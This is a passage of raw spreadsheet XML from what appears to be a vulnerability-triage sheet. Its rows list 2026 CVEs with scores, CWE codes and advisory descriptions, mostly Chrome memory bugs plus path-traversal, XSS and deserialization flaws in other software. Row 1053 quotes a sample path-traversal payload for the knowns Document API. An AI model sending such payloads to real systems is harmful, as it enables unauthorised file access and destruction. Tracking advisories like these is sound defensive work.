      <c r="C1046" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1046" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1046" s="5" t="inlineStr"/>
      <c r="F1046" s="5" t="inlineStr"/>
      <c r="G1046" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1046" s="5" t="inlineStr"/>
      <c r="I1046" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1046" s="5" t="inlineStr"/>
      <c r="K1046" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1046" s="5" t="inlineStr">
        <is>
          <t>The Gutenverse News  WordPress plugin before 3.3.3 does not restrict the extra HTML it adds to WordPress's allowed elements to the context it is meant for, applying the same relaxed list to every sanitisation context including untrusted comments, allowing unauthenticated users to store JavaScript that will execute in the browser of any administrator who reviews the comment queue, and of any visitor to the post once the comment is approved.</t>
        </is>
      </c>
      <c r="M1046" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85677</t>
        </is>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1047" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85684</t>
        </is>
      </c>
      <c r="C1047" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1047" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1047" s="5" t="inlineStr"/>
      <c r="F1047" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1047" s="5" t="inlineStr"/>
      <c r="H1047" s="5" t="inlineStr"/>
      <c r="I1047" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1047" s="5" t="inlineStr"/>
      <c r="K1047" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L1047" s="5" t="inlineStr">
        <is>
          <t>marker through 2.0.0 contains a path traversal vulnerability in the FastAPI /marker/upload handler that fails to sanitize the file.filename parameter. Unauthenticated attackers can supply filenames containing directory traversal sequences to write arbitrary files to any location or delete existing files on the system.</t>
        </is>
      </c>
      <c r="M1047" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85684</t>
        </is>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1048" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85877</t>
        </is>
      </c>
      <c r="C1048" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1048" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1048" s="5" t="inlineStr"/>
      <c r="F1048" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1048" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1048" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2</t>
        </is>
      </c>
      <c r="I1048" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1048" s="5" t="inlineStr"/>
      <c r="K1048" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1048" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1048" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t>
        </is>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1049" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86099</t>
        </is>
      </c>
      <c r="C1049" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1049" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1049" s="5" t="inlineStr"/>
      <c r="F1049" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1049" s="5" t="inlineStr"/>
      <c r="H1049" s="5" t="inlineStr"/>
      <c r="I1049" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1049" s="5" t="inlineStr"/>
      <c r="K1049" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1049" s="5" t="inlineStr">
        <is>
          <t>Chainlit through 2.12.0 fails to validate the client-supplied socket.io sessionId parameter, allowing unauthenticated attackers to traverse filesystem paths by injecting absolute or relative path sequences. Attackers can craft malicious sessionId values that escape the upload directory and recursively delete arbitrary directories accessible to the service process.</t>
        </is>
      </c>
      <c r="M1049" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86099</t>
        </is>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1050" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86404</t>
        </is>
      </c>
      <c r="C1050" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1050" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1050" s="5" t="inlineStr"/>
      <c r="F1050" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1050" s="5" t="inlineStr"/>
      <c r="H1050" s="5" t="inlineStr"/>
      <c r="I1050" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1050" s="5" t="inlineStr"/>
      <c r="K1050" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="L1050" s="5" t="inlineStr">
        <is>
          <t>EAP's Artemis deserialization configuration permits deserialization by default. ObjectMessage.getObject() uses ObjectInputStreamWithClassLoader, which implements allow-list/block-list filtering via its checkSecurity()/isTrustedType() method. However, by default both allow-list and block-list are empty. When the allow-list is empty (size == 0), isTrustedType() returns true for ALL classes. This means all classes are deserializable by default.</t>
        </is>
      </c>
      <c r="M1050" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86404</t>
        </is>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1051" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86482</t>
        </is>
      </c>
      <c r="C1051" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1051" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1051" s="5" t="inlineStr"/>
      <c r="F1051" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1051" s="5" t="inlineStr"/>
      <c r="H1051" s="5" t="inlineStr"/>
      <c r="I1051" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1051" s="5" t="inlineStr"/>
      <c r="K1051" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L1051" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.18634 unchecked group membership changes allowed privilege escalation</t>
        </is>
      </c>
      <c r="M1051" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86482</t>
        </is>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1052" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86542</t>
        </is>
      </c>
      <c r="C1052" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1052" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1052" s="5" t="inlineStr"/>
      <c r="F1052" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1052" s="5" t="inlineStr"/>
      <c r="H1052" s="5" t="inlineStr"/>
      <c r="I1052" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1052" s="5" t="inlineStr"/>
      <c r="K1052" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1052" s="5" t="inlineStr">
        <is>
          <t>knowns before 0.30.0 fails to validate import names in the import routes, allowing unauthenticated attackers to write files outside the imports directory. Attackers can supply traversal sequences in the name parameter to escape the imports directory and overwrite arbitrary files writable by the server process.</t>
        </is>
      </c>
      <c r="M1052" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86542</t>
        </is>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1053" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86775</t>
        </is>
      </c>
      <c r="C1053" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1053" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1053" s="5" t="inlineStr"/>
      <c r="F1053" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1053" s="5" t="inlineStr"/>
      <c r="H1053" s="5" t="inlineStr"/>
      <c r="I1053" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1053" s="5" t="inlineStr"/>
      <c r="K1053" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1053" s="5" t="inlineStr">
        <is>
          <t>knowns (npm package) versions &lt;= 0.29.1 contain a path traversal vulnerability in the Document API. The HTTP handler in internal/server/routes/docs.go normalizes the user-supplied document path with cleanDocPath(), which strips leading/trailing slashes and the .md suffix but does not neutralize ../ traversal sequences, and internal/storage/doc_store.go then builds the target path with filepath.Join(ds.docsDir(), filepath.FromSlash(doc.Path)+".md") without verifying that the resolved path remains inside the documents directory. In the default deployment, where the Management API is unauthenticated and bound to all interfaces, a remote unauthenticated attacker can supply a traversal payload (for example {"path": "../../../../tmp/knowns_pwn_marker"} to POST /api/docs, or an encoded path to GET /api/docs/...) to read, create, overwrite, or delete arbitrary files with a .md extension anywhere on the host filesystem and to create arbitrary directories via os.MkdirAll. This can expose sensitive data stored in other projects' documentation, corrupt or destroy files, and provide an arbitrary-write primitive that may be chained toward code execution. The issue is fixed in version 0.30.0.</t>
        </is>
      </c>
      <c r="M1053" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86775</t>
        </is>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1054" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87430</t>
        </is>
      </c>
      <c r="C1054" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1054" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1054" s="5" t="inlineStr"/>
      <c r="F1054" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1054" s="5" t="inlineStr"/>
      <c r="H1054" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1054" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1054" s="5" t="inlineStr"/>
      <c r="K1054" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1054" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1054" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87430</t>
        </is>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1055" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87433</t>
        </is>
      </c>
      <c r="C1055" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1055" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1055" s="5" t="inlineStr"/>
      <c r="F1055" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1055" s="5" t="inlineStr"/>
      <c r="H1055" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1055" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1055" s="5" t="inlineStr"/>
      <c r="K1055" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L1055" s="5" t="inlineStr">
        <is>
          <t>Race condition in FileAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1055" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87433</t>
        </is>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1056" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87440</t>
        </is>
      </c>
      <c r="C1056" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1056" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1056" s="5" t="inlineStr"/>
      <c r="F1056" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1056" s="5" t="inlineStr"/>
      <c r="H1056" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1056" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1056" s="5" t="inlineStr"/>
      <c r="K1056" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1056" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Media in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1056" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87440</t>
        </is>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1057" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87444</t>
        </is>
      </c>
      <c r="C1057" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1057" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1057" s="5" t="inlineStr"/>
      <c r="F1057" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1057" s="5" t="inlineStr"/>
      <c r="H1057" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1057" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1057" s="5" t="inlineStr"/>
      <c r="K1057" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="L1057" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in Codecs in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87444</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87460</t>
        </is>
      </c>
      <c r="C1058" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1058" s="5" t="inlineStr"/>
      <c r="F1058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1058" s="5" t="inlineStr"/>
      <c r="H1058" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1058" s="5" t="inlineStr">
        <is>
          <t>Use after free in Platform in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87460</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87489</t>
        </is>
      </c>
      <c r="C1059" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1059" s="5" t="inlineStr"/>
      <c r="F1059" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1059" s="5" t="inlineStr"/>
      <c r="H1059" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="L1059" s="5" t="inlineStr">
        <is>
          <t>Memory corruption in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87489</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87536</t>
        </is>
      </c>
      <c r="C1060" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1060" s="5" t="inlineStr"/>
      <c r="F1060" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1060" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87536</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87542</t>
        </is>
      </c>
      <c r="C1061" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1061" s="5" t="inlineStr"/>
      <c r="F1061" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1061" s="5" t="inlineStr">
        <is>
          <t>Use after free in Input in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87542</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87569</t>
        </is>
      </c>
      <c r="C1062" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1062" s="5" t="inlineStr"/>
      <c r="F1062" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1062" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Views in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87569</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87570</t>
        </is>
      </c>
      <c r="C1063" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1063" s="5" t="inlineStr"/>
      <c r="F1063" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in SiteIsolation in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process and leveraged social engineering to bypass site isolation via a crafted file. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87570</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87579</t>
        </is>
      </c>
      <c r="C1064" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1064" s="5" t="inlineStr"/>
      <c r="F1064" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1064" s="5" t="inlineStr">
        <is>
          <t>Buffer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87579</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87585</t>
        </is>
      </c>
      <c r="C1065" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1065" s="5" t="inlineStr"/>
      <c r="F1065" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1065" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1065" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1065" s="5" t="inlineStr">
        <is>
          <t>Double free in PDFium in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code inside the sandbox via a crafted PDF file. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87585</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87587</t>
        </is>
      </c>
      <c r="C1066" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1066" s="5" t="inlineStr"/>
      <c r="F1066" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1066" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="M1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87587</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87588</t>
        </is>
      </c>
      <c r="C1067" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1067" s="5" t="inlineStr"/>
      <c r="F1067" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1067" s="5" t="inlineStr">
        <is>
          <t>Use after free in Chromecast in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to execute arbitrary code inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87588</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87612</t>
        </is>
      </c>
      <c r="C1068" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="D1068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
